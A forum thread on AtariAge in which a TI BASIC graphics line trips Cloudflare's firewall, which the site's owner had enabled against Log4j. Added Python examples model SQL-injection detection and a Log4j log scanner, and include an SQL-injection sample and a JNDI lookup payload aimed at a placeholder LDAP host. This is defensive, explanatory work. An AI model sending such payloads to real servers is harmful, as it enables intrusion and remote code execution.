+Schmitzi Posted December 12, 2021

Hi,

from time to time I read comments here that say that the user's local scanner or firewall complains about a virus. IIRC, this happens while using emulators...

Today I found a TiBasic program (Waterrun from Michael Silberberg) that triggers the AtariAge firewall (or something at their provider's server construct).

And it does not matter if you try to post that text here as plain text, as .TXT-file, or as spoiler. You'll get the following message:

This seems no problem at all, as I triggered the firewall more than 20 times now with snippets/fragments of the basic code, to find out if a special text line is the culprit. And I have no other problems afterwards, all seems OK.

And so it is: You can find the TiBasic file inside this ZIP (posting this is OK), and if you just paste LINE 370 or 380 wherever here around in a post or a message into AA, you will get the error message.

Waterrun.zip

PS: This is the text, as picture, which seems to look like a virus' or intruder's signature:
+Schmitzi Posted December 12, 2021

TEST:

(155,"FF818181818181FF")
+Schmitzi Posted December 12, 2021

So this part of the text seems to be the problem in granular: Just change the x into an H (to make it CALL CHAR again), and you'll get the block:

CxAR(155,"FF818181818181FF")
+9640News Posted December 12, 2021

1 hour ago, Schmitzi said:
So this part of the text seems to be the problem in granular: Just change the x into an H (to make it CALL CHAR again), and you'll get the block:

CHAR(155,"FF818181818181FF")
+Schmitzi Posted December 12, 2021

28 minutes ago, 9640News said:
CHAR(155,"FF818181818181FF")
+Schmitzi Posted December 12, 2021

Strange. This quoting worked, but when I freshly insert 1 line here, it still is blocked...

CHAR(155,"FF818181818181FF")

CHAR(155,"FF818181818181FF")
+arcadeshopper Posted December 12, 2021

@Albert

Sent from my Pixel 6 Pro using Tapatalk
HOME AUTOMATION Posted December 12, 2021

3 hours ago, Schmitzi said:
Strange. This quoting worked, but when I freshly insert 1 line here, it still is blocked...
CHAR(155,"FF818181818181FF")
CHAR(155,"FF818181818181FF")

Keep this up, and you'll eventually crack the code...

...Then we'll all be in trouble!
+Schmitzi Posted December 12, 2021

1 hour ago, arcadeshopper said:
@Albert
Sent from my Pixel 6 Pro using Tapatalk

Yes, I've sent a message to him at the same time. But it wasn't easy to send the code ?
+Schmitzi Posted December 12, 2021

5 hours ago, 9640News said:

Yep, I think quoting seems to work because this is not seen as an external "upload" to the system.
HOME AUTOMATION Posted December 12, 2021

Sooo ...why did HAR turn red!

P.S. ...not joking this time.
Albert Posted December 12, 2021

This is pretty interesting. Yesterday I enabled Cloudflare's "Web Application Firewall" (WAF) to mitigate the new log4j exploit that's out in the wild. This also looks for other known exploits, and I'm guessing that particular character sequence triggered the WAF.

Yep, I just looked and found why it was blocked:

I've disabled this rule, so should be fine now. Until you hit some other rule.

..Al
+OLD CS1 Posted December 12, 2021

8 hours ago, Schmitzi said:
So this part of the text seems to be the problem in granular: Just change the x into an H (to make it CALL CHAR again), and you'll get the block:
CxAR(155,"FF818181818181FF")

CHAR is a SQL type. Like the error note, the CloudFlare firewall also protects against SQL injections, so my guess is it thinks you are trying to send a SQL script and defining a type.

EDIT: Yeah, what he said.
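Why a single signature can read that BASIC line as SQL, shown as an added example that is not part of the thread and is not Cloudflare's actual rule. The regexes, the indicator set and the threshold are hypothetical; the scoring variant blocks only when several independent SQL indicators co-occur.

```python
import re

# Hypothetical, simplified signature: a SQL function/type name followed by "(".
# NOT Cloudflare's rule; it only models the kind of pattern discussed above.
SQL_FUNC = re.compile(r"\b(char|concat|substring|ascii|cast|convert)\s*\(", re.I)

# Independent indicators for the scoring variant (assumed set).
INDICATORS = {
    "sql_function": SQL_FUNC,
    "sql_keyword": re.compile(r"\b(select|union|insert|update|delete|drop)\b", re.I),
    "comment_or_terminator": re.compile(r"(--|/\*|;\s*$)"),
    "tautology": re.compile(r"\bor\s+\d+\s*=\s*\d+", re.I),
}


def naive_block(body: str) -> bool:
    """Block on a single signature hit, as a one-rule filter would."""
    return SQL_FUNC.search(body) is not None


def score(body: str) -> list:
    """Return the names of all indicators present in the body."""
    return [name for name, rx in INDICATORS.items() if rx.search(body)]


def scored_block(body: str, threshold: int = 2) -> bool:
    """Block only when at least `threshold` distinct indicators match."""
    return len(score(body)) >= threshold


# Constructed samples: the line from the thread, the poster's "x" masking,
# and a SQL-shaped string for contrast.
TI_BASIC = 'CALL CHAR(155,"FF818181818181FF")'
MASKED = 'CALL CxAR(155,"FF818181818181FF")'
SQL_LIKE = "id=1 UNION SELECT CHAR(65)--"

if __name__ == "__main__":
    for sample in (TI_BASIC, MASKED, SQL_LIKE):
        print(f"{sample!r}: naive={naive_block(sample)} "
              f"indicators={score(sample)} scored={scored_block(sample)}")
```

The single-rule check blocks the BASIC line and passes the masked one, matching what the posters observed; the scored check lets the BASIC line through while still blocking the SQL-shaped sample.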
+mizapf Posted December 12, 2021

I just read about it; that Log4j bug leads to a rather nasty 0-day exploit. Anyone who is using Log4j version 2 should be alerted!

See also https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/

Why on Earth should one add a parameter expansion / evaluation feature to the write method of a logging framework?! This is seriously crazy.
+TheBF Posted December 15, 2021

On 12/12/2021 at 2:51 PM, mizapf said:
Why on Earth should one add a parameter expansion / evaluation feature to the write method of a logging framework?! This is seriously crazy.

Because they could... Common sense ain't so common.
Asmusr Posted December 15, 2021

On 12/12/2021 at 8:51 PM, mizapf said:
Why on Earth should one add a parameter expansion / evaluation feature to the write method of a logging framework?! This is seriously crazy.

I assume it was added to be able to log information about the user that you would get from ldap into the access log instead of just the user's id. The real issue is the lack of escaping, which allows an outsider to inject these evaluated expressions via the user-agent string.
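A log review for the header injection described in the post above, as an added example that is not part of the thread. It assumes the Apache/nginx "combined" access log format; the sample lines are constructed and use documentation IP ranges and a placeholder host.

```python
import re

# Apache/nginx "combined" log format (assumed; adjust for your own format).
COMBINED = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Opening of a Log4j 2 lookup expression. Matching only the opener flags the
# field regardless of what follows it.
LOOKUP_OPEN = "${"

# Fields whose content is chosen by the client.
CLIENT_FIELDS = ("request", "referer", "agent")


def find_lookup_injection(lines):
    """Return (line_no, ip, field) for each client-controlled field holding '${'."""
    findings = []
    for no, line in enumerate(lines, start=1):
        m = COMBINED.match(line)
        if not m:
            # Surface unparseable lines instead of silently skipping them.
            findings.append((no, None, "unparsed"))
            continue
        for field in CLIENT_FIELDS:
            if LOOKUP_OPEN in m.group(field):
                findings.append((no, m.group("ip"), field))
    return findings


# Constructed sample log lines.
SAMPLE = [
    '192.0.2.10 - - [12/Dec/2021:10:00:01 +0000] "GET /forums/ HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [12/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" '
    '200 312 "-" "${jndi:ldap://example.invalid/a}"',
    '192.0.2.44 - - [12/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" '
    '200 312 "${jndi:ldap://example.invalid/a}" "curl/7.79.1"',
    "truncated or malformed line",
]

if __name__ == "__main__":
    for finding in find_lookup_injection(SAMPLE):
        print(finding)
```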